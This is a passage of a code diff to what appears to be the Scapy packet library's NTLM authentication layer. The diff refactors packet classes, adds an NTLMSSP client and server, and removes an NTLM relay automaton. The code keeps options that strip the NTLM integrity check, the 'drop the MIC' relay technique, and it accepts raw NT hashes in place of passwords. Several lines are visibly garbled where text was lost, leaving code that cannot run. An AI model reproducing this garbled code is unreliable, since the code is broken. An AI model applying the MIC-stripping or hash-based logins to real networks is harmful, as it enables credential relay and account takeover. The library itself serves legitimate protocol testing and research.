self._o_pkt(pkt) + offsets = [ + pkt.getfieldval(x.name + self.offset_name) - o_pkt for x in self.fields + ] + for i, field in enumerate(self.fields): + offset = offsets[i] try: length = pkt.getfieldval(field.name + "Len") except AttributeError: length = len(remain) - offset + # length can't be greater than the difference with the next offset + try: + length = min(length, min(x - offset for x in offsets if x > offset)) + except ValueError: + pass if offset < 0: continue max_offset = max(offset + length, max_offset) - if remain[offset:offset + length]: - results.append((offset, field.name, field.getfield( - pkt, remain[offset:offset + length])[1])) - if max_offset: - ret += remain[max_offset:] + if remain[offset : offset + length]: + results.append( + ( + offset, + field.name, + field.getfield(pkt, remain[offset : offset + length])[1], + ) + ) + ret += remain[max_offset:] results.sort(key=lambda x: x[0]) return ret, [x[1:] for x in results] @@ -180,15 +229,48 @@ def getfield(self, pkt, s): class _NTLMPayloadPacket(Packet): _NTLM_PAYLOAD_FIELD_NAME = "Payload" - def __getattr__(self, attr): + def __init__( + self, + _pkt=b"", # type: Union[bytes, bytearray] + post_transform=None, # type: Any + _internal=0, # type: int + _underlayer=None, # type: Optional[Packet] + _parent=None, # type: Optional[Packet] + **fields, # type: Any + ): + # pop unknown fields. We can't process them until the packet is initialized + unknown = { + k: fields.pop(k) + for k in list(fields) + if not any(k == f.name for f in self.fields_desc) + } + super(_NTLMPayloadPacket, self).__init__( + _pkt=_pkt, + post_transform=post_transform, + _internal=_internal, + _underlayer=_underlayer, + _parent=_parent, + **fields, + ) + # check unknown fields for implicit ones + local_fields = next( + [y.name for y in x.fields] + for x in self.fields_desc + if x.name == self._NTLM_PAYLOAD_FIELD_NAME + ) + implicit_fields = {k: v for k, v in unknown.items() if k in local_fields} + for k, value in implicit_fields.items(): + self.setfieldval(k, value) + + def getfieldval(self, attr): # Ease compatibility with _NTLMPayloadField try: - return super(_NTLMPayloadPacket, self).__getattr__(attr) + return super(_NTLMPayloadPacket, self).getfieldval(attr) except AttributeError: try: return next( x[1] - for x in super(_NTLMPayloadPacket, self).__getattr__( + for x in super(_NTLMPayloadPacket, self).getfieldval( self._NTLM_PAYLOAD_FIELD_NAME ) if x[0] == attr @@ -196,6 +278,29 @@ def __getattr__(self, attr): except StopIteration: raise AttributeError(attr) + def getfield_and_val(self, attr): + # Ease compatibility with _NTLMPayloadField + try: + return super(_NTLMPayloadPacket, self).getfield_and_val(attr) + except ValueError: + PayFields = self.get_field(self._NTLM_PAYLOAD_FIELD_NAME).fields_map + try: + return ( + PayFields[attr], + PayFields[attr].h2i( # cancel out the i2h.. it's dumb i know + self, + next( + x[1] + for x in super(_NTLMPayloadPacket, self).__getattr__( + self._NTLM_PAYLOAD_FIELD_NAME + ) + if x[0] == attr + ), + ), + ) + except (StopIteration, KeyError): + raise ValueError(attr) + def setfieldval(self, attr, val): # Ease compatibility with _NTLMPayloadField try: @@ -207,42 +312,72 @@ def setfieldval(self, attr, val): if attr not in self.get_field(self._NTLM_PAYLOAD_FIELD_NAME).fields_map: raise AttributeError(attr) try: - Payload.pop(next( - i - for i, x in enumerate( - super(_NTLMPayloadPacket, self).__getattr__( - self._NTLM_PAYLOAD_FIELD_NAME - )) - if x[0] == attr - )) + Payload.pop( + next( + i + for i, x in enumerate( + super(_NTLMPayloadPacket, self).__getattr__( + self._NTLM_PAYLOAD_FIELD_NAME + ) + ) + if x[0] == attr + ) + ) except StopIteration: pass Payload.append([attr, val]) super(_NTLMPayloadPacket, self).setfieldval( - self._NTLM_PAYLOAD_FIELD_NAME, - Payload + self._NTLM_PAYLOAD_FIELD_NAME, Payload ) -def _NTLM_post_build(self, p, pay_offset, fields): - # type: (Packet, bytes, int, Dict[str, Tuple[str, int]]) -> bytes +class _NTLM_ENUM(IntEnum): + LEN = 0x0001 + MAXLEN = 0x0002 + OFFSET = 0x0004 + COUNT = 0x0008 + PAD8 = 0x1000 + + +_NTLM_CONFIG = [ + ("Len", _NTLM_ENUM.LEN), + ("MaxLen", _NTLM_ENUM.MAXLEN), + ("BufferOffset", _NTLM_ENUM.OFFSET), +] + + +def _NTLM_post_build(self, p, pay_offset, fields, config=_NTLM_CONFIG): """Util function to build the offset and populate the lengths""" - for field_name, value in self.fields["Payload"]: - length = self.get_field( - "Payload").fields_map[field_name].i2len(self, value) + for field_name, value in self.fields[self._NTLM_PAYLOAD_FIELD_NAME]: + fld = self.get_field(self._NTLM_PAYLOAD_FIELD_NAME).fields_map[field_name] + length = fld.i2len(self, value) + count = fld.i2count(self, value) offset = fields[field_name] - # Length - if self.getfieldval(field_name + "Len") is None: - p = p[:offset] + \ - struct.pack(" bytes - return _NTLM_post_build(self, pkt, self.OFFSET, { - "DomainName": 16, - "WorkstationName": 24, - }) + pay + return ( + _NTLM_post_build( + self, + pkt, + self.OFFSET, + { + "DomainName": 16, + "WorkstationName": 24, + }, + ) + + pay + ) + # Challenge class Single_Host_Data(Packet): fields_desc = [ - LEIntField("Size", 0), + LEIntField("Size", 48), LEIntField("Z4", 0), XStrFixedLenField("CustomData", b"", length=8), XStrFixedLenField("MachineID", b"", length=32), @@ -388,37 +538,59 @@ def default_payload_class(self, payload): class AV_PAIR(Packet): name = "NTLM AV Pair" fields_desc = [ - LEShortEnumField('AvId', 0, { - 0x0000: "MsvAvEOL", - 0x0001: "MsvAvNbComputerName", - 0x0002: "MsvAvNbDomainName", - 0x0003: "MsvAvDnsComputerName", - 0x0004: "MsvAvDnsDomainName", - 0x0005: "MsvAvDnsTreeName", - 0x0006: "MsvAvFlags", - 0x0007: "MsvAvTimestamp", - 0x0008: "MsvAvSingleHost", - 0x0009: "MsvAvTargetName", - 0x000A: "MsvAvChannelBindings", - }), - FieldLenField('AvLen', None, length_of="Value", fmt=" bytes - return _NTLM_post_build(self, pkt, self.OFFSET, { - "TargetName": 12, - "TargetInfo": 40, - }) + pay + return ( + _NTLM_post_build( + self, + pkt, + self.OFFSET, + { + "TargetName": 12, + "TargetInfo": 40, + }, + ) + + pay + ) # Authenticate + class LM_RESPONSE(Packet): fields_desc = [ StrFixedLenField("Response", b"", length=24), @@ -484,22 +674,29 @@ class NTLM_RESPONSE(Packet): class NTLMv2_CLIENT_CHALLENGE(Packet): fields_desc = [ - ByteField("RespType", 0), - ByteField("HiRespType", 0), + ByteField("RespType", 1), + ByteField("HiRespType", 1), LEShortField("Reserved1", 0), LEIntField("Reserved2", 0), - UTCTimeField("TimeStamp", None, fmt=" 72) + or pkt.fields.get("MIC", b""), ), # Payload _NTLMPayloadField( - 'Payload', OFFSET, [ + "Payload", + lambda pkt: ((pkt.DomainNameBufferOffset or 88) > 72) and 88 or 72, + [ MultipleTypeField( - [(PacketField('LmChallengeResponse', LMv2_RESPONSE(), - LMv2_RESPONSE), lambda pkt: pkt.NTLM_VERSION == 2)], - PacketField('LmChallengeResponse', - LM_RESPONSE(), LM_RESPONSE) + [ + ( + PacketField( + "LmChallengeResponse", LMv2_RESPONSE(), LMv2_RESPONSE + ), + lambda pkt: pkt.NTLM_VERSION == 2, + ) + ], + PacketField("LmChallengeResponse", LM_RESPONSE(), LM_RESPONSE), ), MultipleTypeField( - [(PacketField('NtChallengeResponse', NTLMv2_RESPONSE(), - NTLMv2_RESPONSE), lambda pkt: pkt.NTLM_VERSION == 2)], - PacketField('NtChallengeResponse', - NTLM_RESPONSE(), NTLM_RESPONSE) + [ + ( + PacketField( + "NtChallengeResponse", + NTLMv2_RESPONSE(), + NTLMv2_RESPONSE, + ), + lambda pkt: pkt.NTLM_VERSION == 2, + ) + ], + PacketField("NtChallengeResponse", NTLM_RESPONSE(), NTLM_RESPONSE), ), - _NTLMStrField('DomainName', b''), - _NTLMStrField('UserName', b''), - _NTLMStrField('Workstation', b''), - XStrField('EncryptedRandomSessionKey', b''), - ]) + _NTLMStrField("DomainName", b""), + _NTLMStrField("UserName", b""), + _NTLMStrField("Workstation", b""), + XStrField("EncryptedRandomSessionKey", b""), + ], + ), ] def post_build(self, pkt, pay): # type: (bytes, bytes) -> bytes - return _NTLM_post_build(self, pkt, self.OFFSET, { - "LmChallengeResponse": 12, - "NtChallengeResponse": 20, - "DomainName": 28, - "UserName": 36, - "Workstation": 44, - "EncryptedRandomSessionKey": 52 - }) + pay + return ( + _NTLM_post_build( + self, + pkt, + ((self.DomainNameBufferOffset or 88) > 72) and 88 or 72, + { + "LmChallengeResponse": 12, + "NtChallengeResponse": 20, + "DomainName": 28, + "UserName": 36, + "Workstation": 44, + "EncryptedRandomSessionKey": 52, + }, + ) + + pay + ) + + def compute_mic(self, ExportedSessionKey, negotiate, challenge): + self.MIC = b"\x00" * 16 + self.MIC = HMAC_MD5( + ExportedSessionKey, bytes(negotiate) + bytes(challenge) + bytes(self) + ) class NTLM_AUTHENTICATE_V2(NTLM_AUTHENTICATE): @@ -615,473 +840,11 @@ def HTTP_ntlm_negotiate(ntlm_negotiate): """Create an HTTP NTLM negotiate packet from an NTLM_NEGOTIATE message""" assert isinstance(ntlm_negotiate, NTLM_NEGOTIATE) from scapy.layers.http import HTTP, HTTPRequest + return HTTP() / HTTPRequest( Authorization=b"NTLM " + bytes_base64(bytes(ntlm_negotiate)) ) -# Answering machine - - -class _NTLM_Automaton(Automaton): - def __init__(self, sock, **kwargs): - # type: (StreamSocket, Any) -> None - self.token_pipe = ObjectPipe() - self.values = {} - for key, dflt in [("DROP_MIC_v1", False), ("DROP_MIC_v2", False)]: - setattr(self, key, kwargs.pop(key, dflt)) - self.DROP_MIC = self.DROP_MIC_v1 or self.DROP_MIC_v2 - super(_NTLM_Automaton, self).__init__( - recvsock=lambda **kwargs: sock, - ll=lambda **kwargs: sock, - **kwargs - ) - - def _get_token(self, token): - if not token: - return None, None, None, None - - from scapy.layers.gssapi import ( - GSSAPI_BLOB, - SPNEGO_negToken, - SPNEGO_Token - ) - - negResult = None - MIC = None - rawToken = False - - if isinstance(token, bytes): - # SMB 1 - non extended - return (token, None, None, True) - if isinstance(token, (NTLM_NEGOTIATE, - NTLM_CHALLENGE, - NTLM_AUTHENTICATE, - NTLM_AUTHENTICATE_V2)): - ntlm = token - rawToken = True - else: - if isinstance(token, GSSAPI_BLOB): - token = token.innerContextToken - if isinstance(token, SPNEGO_negToken): - token = token.token - if hasattr(token, "mechListMIC") and token.mechListMIC: - MIC = token.mechListMIC.value - if hasattr(token, "negResult"): - negResult = token.negResult - try: - ntlm = token.mechToken - except AttributeError: - ntlm = token.responseToken - if isinstance(ntlm, SPNEGO_Token): - ntlm = ntlm.value - if isinstance(ntlm, ASN1_STRING): - ntlm = NTLM_Header(ntlm.val) - if isinstance(ntlm, conf.raw_layer): - ntlm = NTLM_Header(ntlm.load) - if self.DROP_MIC_v1 or self.DROP_MIC_v2: - if isinstance(ntlm, NTLM_AUTHENTICATE): - ntlm.MIC = b"\0" * 16 - ntlm.NtChallengeResponseLen = None - ntlm.NtChallengeResponseMaxLen = None - ntlm.EncryptedRandomSessionKeyBufferOffset = None - if self.DROP_MIC_v2: - ChallengeResponse = next( - v[1] for v in ntlm.Payload - if v[0] == 'NtChallengeResponse' - ) - i = next( - i for i, k in enumerate(ChallengeResponse.AvPairs) - if k.AvId == 0x0006 - ) - ChallengeResponse.AvPairs.insert( - i + 1, - AV_PAIR(AvId="MsvAvFlags", Value=0) - ) - return ntlm, negResult, MIC, rawToken - - def received_ntlm_token(self, ntlm): - self.token_pipe.send(ntlm) - - def get(self, attr, default=None): - if default is not None: - return self.values.get(attr, default) - return self.values[attr] - - def end(self): - self.listen_sock.close() - self.stop() - - -class NTLM_Client(_NTLM_Automaton): - """ - A class to overload to create a client automaton when using - NTLM. - """ - port = 445 - cls = conf.raw_layer - ssl = False - kwargs_cls = {} - - def __init__(self, *args, **kwargs): - self.client_pipe = ObjectPipe() - super(NTLM_Client, self).__init__(*args, **kwargs) - - def bind(self, srv_atmt): - # type: (NTLM_Server) -> None - self.srv_atmt = srv_atmt - - def set_srv(self, attr, value): - self.srv_atmt.values[attr] = value - - def get_token(self): - return self.srv_atmt.token_pipe.recv() - - def echo(self, pkt): - return self.srv_atmt.send(pkt) - - def wait_server(self): - kwargs = self.client_pipe.recv() - self.client_pipe.close() - return kwargs - - -class NTLM_Server(_NTLM_Automaton): - """ - A class to overload to create a server automaton when using - NTLM. - - :param NTLM_VALUES: a dict whose keys are - - "NetbiosDomainName" - - "NetbiosComputerName" - - "DnsDomainName" - - "DnsComputerName" - - "DnsTreeName" - - "Flags" - - "Timestamp" - - :param IDENTITIES: a dict {"username": NTOWFv2("password", "username", "domain")} - (this is the KeyResponseNT). Setting this value enables - signature computation and authenticates inbound users. - :param DOMAIN_AUTH: a tuple ("", "machineName", b"machinePassword") to - use for domain authentication, used to establish the netlogon - session. (UNIMPLEMENTED) - """ - port = 445 - cls = conf.raw_layer - - def __init__(self, *args, **kwargs): - self.cli_atmt = None - self.cli_values = dict() - self.ntlm_values = kwargs.pop("NTLM_VALUES", None) - self.ntlm_state = 0 - self.DOMAIN_AUTH = kwargs.pop("DOMAIN_AUTH", None) - self.IDENTITIES = kwargs.pop("IDENTITIES", None) - self.CHECK_LOGIN = bool(self.IDENTITIES) or bool(self.DOMAIN_AUTH) - self.SigningSessionKey = None - self.Challenge = None - super(NTLM_Server, self).__init__(*args, **kwargs) - - def bind(self, cli_atmt): - # type: (NTLM_Client) -> None - self.cli_atmt = cli_atmt - - def get_token(self, negoex=False): - if negoex: - # Special case: negoex - if self.cli_atmt: - return self.cli_atmt.token_pipe.recv() - else: - self.token_pipe.clear() - return None, None, None, None - from random import randint - if self.ntlm_state == 0: - # First token asked (after negotiate) - self.ntlm_state = 1 - negResult, MIC, rawToken = None, None, False - # Take a default token - tok = NTLM_CHALLENGE( - ServerChallenge=struct.pack(" %s" % - (repr(address), repr(_sock.getsockname()))) - cli_atmt = remoteClientCls(remote_sock, debug=debug, **client_kwargs) - sock_tup = ((srv_atmt, cli_atmt), (sock, remote_sock)) - sniffers.append(sock_tup) - # Bind NTLM functions - srv_atmt.bind(cli_atmt) - cli_atmt.bind(srv_atmt) - # Start automatons - srv_atmt.runbg() - cli_atmt.runbg() - except KeyboardInterrupt: - print("Exiting.") - finally: - for atmts, socks in sniffers: - for atmt in atmts: - try: - atmt.forcestop(wait=False) - except Exception: - pass - for sock in socks: - try: - sock.close() - except Exception: - pass - ssock.close() - - -def ntlm_server(serverCls, - server_kwargs=None, - iface=None, - debug=2): - """ - Starts a standalone NTLM server class - """ - assert issubclass( - serverCls, NTLM_Server), "Specify a correct NTLM server class" - - ssock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - ssock.bind( - (get_if_addr(iface or conf.iface), serverCls.port)) - ssock.listen(5) - print(conf.color_theme.green( - "Server %s started. Waiting..." % serverCls.__name__ - )) - sniffers = [] - server_kwargs = server_kwargs or {} - try: - evt = threading.Event() - while not evt.is_set(): - clientsocket, address = ssock.accept() - sock = StreamSocket(clientsocket, serverCls.cls) - srv_atmt = serverCls(sock, debug=debug, **server_kwargs) - sniffers.append((srv_atmt, sock)) - print(conf.color_theme.gold("-> %s connected " % repr(address))) - # Start automatons - srv_atmt.runbg() - except KeyboardInterrupt: - print("Exiting.") - finally: - for atmt, sock in sniffers: - try: - atmt.forcestop(wait=False) - except Exception: - pass - try: - sock.close() - except Exception: - pass - ssock.close() - # Experimental - Reversed stuff @@ -1089,6 +852,7 @@ def ntlm_server(serverCls, # but described as an "opaque blob": this was reversed and everything is a # placeholder. + class NEGOEX_EXCHANGE_NTLM_ITEM(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( @@ -1096,9 +860,9 @@ class NEGOEX_EXCHANGE_NTLM_ITEM(ASN1_Packet): ASN1F_SEQUENCE( ASN1F_OID("oid", ""), ASN1F_PRINTABLE_STRING("token", ""), - explicit_tag=0x31 + explicit_tag=0x31, ), - explicit_tag=0x80 + explicit_tag=0x80, ) ) @@ -1108,14 +872,11 @@ class NEGOEX_EXCHANGE_NTLM(ASN1_Packet): GSSAPI NegoEX Exchange metadata blob This was reversed and may be meaningless """ + ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( ASN1F_SEQUENCE( - ASN1F_SEQUENCE_OF( - "items", [], - NEGOEX_EXCHANGE_NTLM_ITEM - ), - implicit_tag=0xa0 + ASN1F_SEQUENCE_OF("items", [], NEGOEX_EXCHANGE_NTLM_ITEM), implicit_tag=0xA0 ), ) @@ -1124,18 +885,20 @@ class NEGOEX_EXCHANGE_NTLM(ASN1_Packet): def HMAC_MD5(key, data): - h = hmac.HMAC(key, hashes.MD5()) - h.update(data) - return h.finalize() + return Hmac_MD5(key=key).digest(data) -def MD4(x): - return Hash_MD4().digest(x) +def MD4le(x): + """ + MD4 over a string encoded as utf-16le + """ + return Hash_MD4().digest(x.encode("utf-16le")) def RC4Init(key): """Alleged RC4""" from cryptography.hazmat.primitives.ciphers import Cipher, algorithms + algorithm = algorithms.ARC4(key) cipher = Cipher(algorithm, mode=None) encryptor = cipher.encryptor() @@ -1152,28 +915,45 @@ def RC4K(key, data): RC4 algorithm. """ from cryptography.hazmat.primitives.ciphers import Cipher, algorithms + algorithm = algorithms.ARC4(key) cipher = Cipher(algorithm, mode=None) encryptor = cipher.encryptor() return encryptor.update(data) + encryptor.finalize() + # sect 2.2.2.9 - With Extended Session Security class NTLMSSP_MESSAGE_SIGNATURE(Packet): + # [MS-RPCE] sect 2.2.2.9.1/2.2.2.9.2 fields_desc = [ - LEIntField("Version", 1), - StrFixedLenField("Checksum", b"", length=8), - LEIntField("SeqNum", 0), + LEIntField("Version", 0x00000001), + XStrFixedLenField("Checksum", b"", length=8), + LEIntField("SeqNum", 0x00000000), ] + +_GSSAPI_OIDS["1.3.6.1.4.1.311.2.2.10"] = NTLM_Header +_GSSAPI_SIGNATURE_OIDS["1.3.6.1.4.1.311.2.2.10"] = NTLMSSP_MESSAGE_SIGNATURE + + # sect 3.3.2 -def NTOWFv2(Passwd, User, UserDom): - """Computes the ResponseKeyNT""" - return HMAC_MD5(MD4(Passwd.encode("utf-16le")), - (User.upper() + UserDom).encode("utf-16le")) +def NTOWFv2(Passwd, User, UserDom, HashNt=None): + """ + Computes the ResponseKeyNT (per [MS-NLMP] sect 3.3.2) + + :param Passwd: the plain password + :param User: the username + :param UserDom: the domain name + :param HashNt: (out of spec) if you have the HashNt, use this and set + Passwd to None + """ + if HashNt is None: + HashNt = MD4le(Passwd) + return HMAC_MD5(HashNt, (User.upper() + UserDom).encode("utf-16le")) def NTLMv2_ComputeSessionBaseKey(ResponseKeyNT, NTProofStr): @@ -1182,6 +962,7 @@ def NTLMv2_ComputeSessionBaseKey(ResponseKeyNT, NTProofStr): # sect 3.4.4.2 - With Extended Session Security + def MAC(Handle, SigningKey, SeqNum, Message): chksum = HMAC_MD5(SigningKey, struct.pack(".local) + :param COMPUTER_NB_NAME: the server Netbios name (default: SRV) + :param COMPUTER_FQDN: the server FQDN + (default: .) + :param IDENTITIES: a dict {"username": } + Setting this value enables signature computation and + authenticates inbound users. + """ + + oid = "1.3.6.1.4.1.311.2.2.10" + auth_type = 0x0A + + class STATE(SSP.STATE): + INIT = 1 + CLI_SENT_NEGO = 2 + CLI_SENT_AUTH = 3 + SRV_SENT_CHAL = 4 + + class CONTEXT(SSP.CONTEXT): + __slots__ = [ + "SessionKey", + "ExportedSessionKey", + "SendSignKey", + "SendSealKey", + "RecvSignKey", + "RecvSealKey", + "SendSealHandle", + "RecvSealHandle", + "SendSeqNum", + "RecvSeqNum", + "neg_tok", + "chall_tok", + "ServerHostname", + ] + + def __init__(self): + self.state = NTLMSSP.STATE.INIT + self.SessionKey = None + self.ExportedSessionKey = None + self.SendSignKey = None + self.SendSealKey = None + self.SendSealHandle = None + self.RecvSignKey = None + self.RecvSealKey = None + self.RecvSealHandle = None + self.SendSeqNum = 0 + self.RecvSeqNum = 0 + self.neg_tok = None + self.chall_tok = None + self.ServerHostname = None + + def __repr__(self): + return "NTLMSSP" + + def __init__( + self, + UPN=None, + HASHNT=None, + PASSWORD=None, + USE_MIC=True, + NTLM_VALUES={}, + DOMAIN_NB_NAME="DOMAIN", + DOMAIN_FQDN=None, + COMPUTER_NB_NAME="SRV", + COMPUTER_FQDN=None, + IDENTITIES=None, + DROP_MIC_v1=False, + DROP_MIC_v2=False, + DO_NOT_CHECK_LOGIN=False, + **kwargs, + ): + self.UPN = UPN + if HASHNT is None and PASSWORD is not None: + HASHNT = MD4le(PASSWORD) + self.HASHNT = HASHNT + self.USE_MIC = USE_MIC + self.NTLM_VALUES = NTLM_VALUES + self.DOMAIN_NB_NAME = DOMAIN_NB_NAME + self.DOMAIN_FQDN = DOMAIN_FQDN or (self.DOMAIN_NB_NAME.lower() + ".local") + self.COMPUTER_NB_NAME = COMPUTER_NB_NAME + self.COMPUTER_FQDN = COMPUTER_FQDN or ( + self.COMPUTER_NB_NAME.lower() + "." + self.DOMAIN_FQDN + ) + self.IDENTITIES = IDENTITIES + self.DO_NOT_CHECK_LOGIN = DO_NOT_CHECK_LOGIN + self.DROP_MIC_v1 = DROP_MIC_v1 + self.DROP_MIC_v2 = DROP_MIC_v2 + super(NTLMSSP, self).__init__(**kwargs) + + def LegsAmount(self, Context: CONTEXT): + return 3 + + def GSS_GetMICEx(self, Context, msgs, qop_req=0): + """ + [MS-NLMP] sect 3.4.8 + """ + # Concatenate the ToSign + ToSign = b"".join(x.data for x in msgs if x.sign) + sig = MAC( + Context.SendSealHandle, + Context.SendSignKey, + Context.SendSeqNum, + ToSign, + ) + Context.SendSeqNum += 1 + return sig + + def GSS_VerifyMICEx(self, Context, msgs, signature): + """ + [MS-NLMP] sect 3.4.9 + """ + Context.RecvSeqNum = signature.SeqNum + # Concatenate the ToSign + ToSign = b"".join(x.data for x in msgs if x.sign) + sig = MAC( + Context.RecvSealHandle, + Context.RecvSignKey, + Context.RecvSeqNum, + ToSign, + ) + if sig.Checksum != signature.Checksum: + raise ValueError("ERROR: Checksums don't match") + + def GSS_WrapEx(self, Context, msgs, qop_req=0): + """ + [MS-NLMP] sect 3.4.6 + """ + msgs_cpy = copy.deepcopy(msgs) # Keep copy for signature + # Encrypt + for msg in msgs: + if msg.conf_req_flag: + msg.data = RC4(Context.SendSealHandle, msg.data) + # Sign + sig = self.GSS_GetMICEx(Context, msgs_cpy, qop_req=qop_req) + return ( + msgs, + sig, + ) + + def GSS_UnwrapEx(self, Context, msgs, signature): + """ + [MS-NLMP] sect 3.4.7 + """ + # Decrypt + for msg in msgs: + if msg.conf_req_flag: + msg.data = RC4(Context.RecvSealHandle, msg.data) + # Check signature + self.GSS_VerifyMICEx(Context, msgs, signature) + return msgs + + def canMechListMIC(self, Context): + if not self.USE_MIC: + # RFC 4178 + # "If the mechanism selected by the negotiation does not support integrity + # protection, then no mechlistMIC token is used." + return False + if not Context or not Context.SessionKey: + # Not available yet + return False + return True + + def getMechListMIC(self, Context, input): + # [MS-SPNG] + # "When NTLM is negotiated, the SPNG server MUST set OriginalHandle to + # ServerHandle before generating the mechListMIC, then set ServerHandle to + # OriginalHandle after generating the mechListMIC." + + # i.e. use a new RC4 handle + + return bytes(MAC(RC4Init(Context.SendSealKey), Context.SendSignKey, 0, input)) + + def verifyMechListMIC(self, Context, otherMIC, input): + # [MS-SPNG] + # "the SPNEGO Extension server MUST set OriginalHandle to ClientHandle before + # validating the mechListMIC and then set ClientHandle to OriginalHandle after + # validating the mechListMIC." + + # i.e. again, use a new RC4 handle + + if otherMIC != bytes( + MAC(RC4Init(Context.RecvSealKey), Context.RecvSignKey, 0, input) + ): + raise ValueError("Bad mechListMIC !") + + def GSS_Init_sec_context(self, Context: CONTEXT, val=None): + if Context is None: + Context = self.CONTEXT() + + if Context.state == self.STATE.INIT: + # Client: negotiate + # Create a default token + tok = NTLM_NEGOTIATE( + NegotiateFlags="+".join( + [ + "NEGOTIATE_UNICODE", + "REQUEST_TARGET", + "NEGOTIATE_SIGN", + "NEGOTIATE_SEAL", + "NEGOTIATE_NTLM", + "NEGOTIATE_ALWAYS_SIGN", + "TARGET_TYPE_DOMAIN", + "NEGOTIATE_EXTENDED_SESSIONSECURITY", + "NEGOTIATE_TARGET_INFO", + "NEGOTIATE_VERSION", + "NEGOTIATE_128", + "NEGOTIATE_KEY_EXCH", + "NEGOTIATE_56", + ] + ), + ProductMajorVersion=10, + ProductMinorVersion=0, + ProductBuild=19041, + ) + if self.NTLM_VALUES: + # Update that token with the customs one + for key in [ + "NegotiateFlags", + "ProductMajorVersion", + "ProductMinorVersion", + "ProductBuild", + ]: + if key in self.NTLM_VALUES: + setattr(tok, key, self.NTLM_VALUES[key]) + Context.neg_tok = tok + Context.SessionKey = None # Reset signing (if previous auth failed) + Context.state = self.STATE.CLI_SENT_NEGO + return Context, tok, GSS_S_CONTINUE_NEEDED + elif Context.state == self.STATE.CLI_SENT_NEGO: + # Client: auth (val=challenge) + chall_tok = val + if self.UPN is None or self.HASHNT is None: + raise ValueError( + "Must provide a 'UPN' and a 'HASHNT' or 'PASSWORD' when " + "running in standalone !" + ) + if not chall_tok or NTLM_CHALLENGE not in chall_tok: + chall_tok.show() + raise ValueError("NTLMSSP: Unexpected token. Expected NTLM Challenge") + # Take a default token + tok = NTLM_AUTHENTICATE_V2( + NegotiateFlags=chall_tok.NegotiateFlags, + ProductMajorVersion=10, + ProductMinorVersion=0, + ProductBuild=19041, + ) + tok.LmChallengeResponse = LMv2_RESPONSE() + from scapy.layers.kerberos import _parse_upn + try: + tok.UserName, realm = _parse_upn(self.UPN) + except ValueError: + tok.UserName, realm = self.UPN, None + if realm is None: + try: + tok.DomainName = chall_tok.getAv(0x0002).Value + except IndexError: + log_runtime.warning( + "No realm specified in UPN, nor provided by server" + ) + tok.DomainName = self.DOMAIN_NB_NAME.encode() + else: + tok.DomainName = realm + try: + tok.Workstation = Context.ServerHostname = chall_tok.getAv( + 0x0001 + ).Value # noqa: E501 + except IndexError: + tok.Workstation = "WIN" + cr = tok.NtChallengeResponse = NTLMv2_RESPONSE( + ChallengeFromClient=os.urandom(8), + ) + try: + # the client SHOULD set the timestamp in the CHALLENGE_MESSAGE + cr.TimeStamp = chall_tok.getAv(0x0007).Value + except IndexError: + pass + cr.AvPairs = ( + chall_tok.TargetInfo[:-1] + + ( + [ + AV_PAIR(AvId="MsvAvFlags", Value="MIC integrity"), + ] + if self.USE_MIC + else [] + ) + + [ + AV_PAIR( + AvId="MsvAvSingleHost", + Value=Single_Host_Data(MachineID=os.urandom(32)), + ), + AV_PAIR(AvId="MsvAvChannelBindings", Value=b"\x00" * 16), + AV_PAIR(AvId="MsvAvTargetName", Value="host/" + tok.Workstation), + AV_PAIR(AvId="MsvAvEOL"), + ] + ) + if self.NTLM_VALUES: + # Update that token with the customs one + for key in [ + "NegotiateFlags", + "ProductMajorVersion", + "ProductMinorVersion", + "ProductBuild", + ]: + if key in self.NTLM_VALUES: + setattr(tok, key, self.NTLM_VALUES[key]) + if self.DROP_MIC_v1 or self.DROP_MIC_v2: + tok.MIC = b"\0" * 16 + tok.NtChallengeResponseLen = None + tok.NtChallengeResponseMaxLen = None + tok.EncryptedRandomSessionKeyBufferOffset = None + if self.DROP_MIC_v2: + ChallengeResponse = next( + v[1] for v in tok.Payload if v[0] == "NtChallengeResponse" + ) + i = next( + i + for i, k in enumerate(ChallengeResponse.AvPairs) + if k.AvId == 0x0006 + ) + ChallengeResponse.AvPairs.insert( + i + 1, AV_PAIR(AvId="MsvAvFlags", Value=0) + ) + # Compute the ResponseKeyNT + ResponseKeyNT = NTOWFv2( + None, + tok.UserName, + tok.DomainName, + HashNt=self.HASHNT, + ) + # Compute the NTProofStr + cr.NTProofStr = cr.computeNTProofStr( + ResponseKeyNT, + chall_tok.ServerChallenge, + ) + # Compute the Session Key + SessionBaseKey = NTLMv2_ComputeSessionBaseKey(ResponseKeyNT, cr.NTProofStr) + KeyExchangeKey = SessionBaseKey # Only true for NTLMv2 + if chall_tok.NegotiateFlags.NEGOTIATE_KEY_EXCH: + ExportedSessionKey = os.urandom(16) + tok.EncryptedRandomSessionKey = RC4K( + KeyExchangeKey, + ExportedSessionKey, + ) + else: + ExportedSessionKey = KeyExchangeKey + if self.USE_MIC: + tok.compute_mic(ExportedSessionKey, Context.neg_tok, chall_tok) + Context.ExportedSessionKey = ExportedSessionKey + # [MS-SMB] 3.2.5.3 + Context.SessionKey = Context.ExportedSessionKey + # Compute NTLM keys + Context.SendSignKey = SIGNKEY( + tok.NegotiateFlags, ExportedSessionKey, "Client" + ) + Context.SendSealKey = SEALKEY( + tok.NegotiateFlags, ExportedSessionKey, "Client" + ) + Context.SendSealHandle = RC4Init(Context.SendSealKey) + Context.RecvSignKey = SIGNKEY( + tok.NegotiateFlags, ExportedSessionKey, "Server" + ) + Context.RecvSealKey = SEALKEY( + tok.NegotiateFlags, ExportedSessionKey, "Server" + ) + Context.RecvSealHandle = RC4Init(Context.RecvSealKey) + Context.state = self.STATE.CLI_SENT_AUTH + return Context, tok, GSS_S_COMPLETE + elif Context.state == self.STATE.CLI_SENT_AUTH: + if val: + # what is that? + status = GSS_S_DEFECTIVE_CREDENTIAL + else: + status = GSS_S_COMPLETE + return Context, None, status + else: + raise ValueError("NTLMSSP: unexpected state %s" % repr(Context.state)) + + def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): + if Context is None: + Context = self.CONTEXT() + + if Context.state == self.STATE.INIT: + # Server: challenge (val=negotiate) + nego_tok = val + if not nego_tok or NTLM_NEGOTIATE not in nego_tok: + nego_tok.show() + raise ValueError("NTLMSSP: Unexpected token. Expected NTLM Negotiate") + # Take a default token + currentTime = (time.time() + 11644473600) * 1e7 + tok = NTLM_CHALLENGE( + ServerChallenge=os.urandom(8), + NegotiateFlags="+".join( + [ + "NEGOTIATE_UNICODE", + 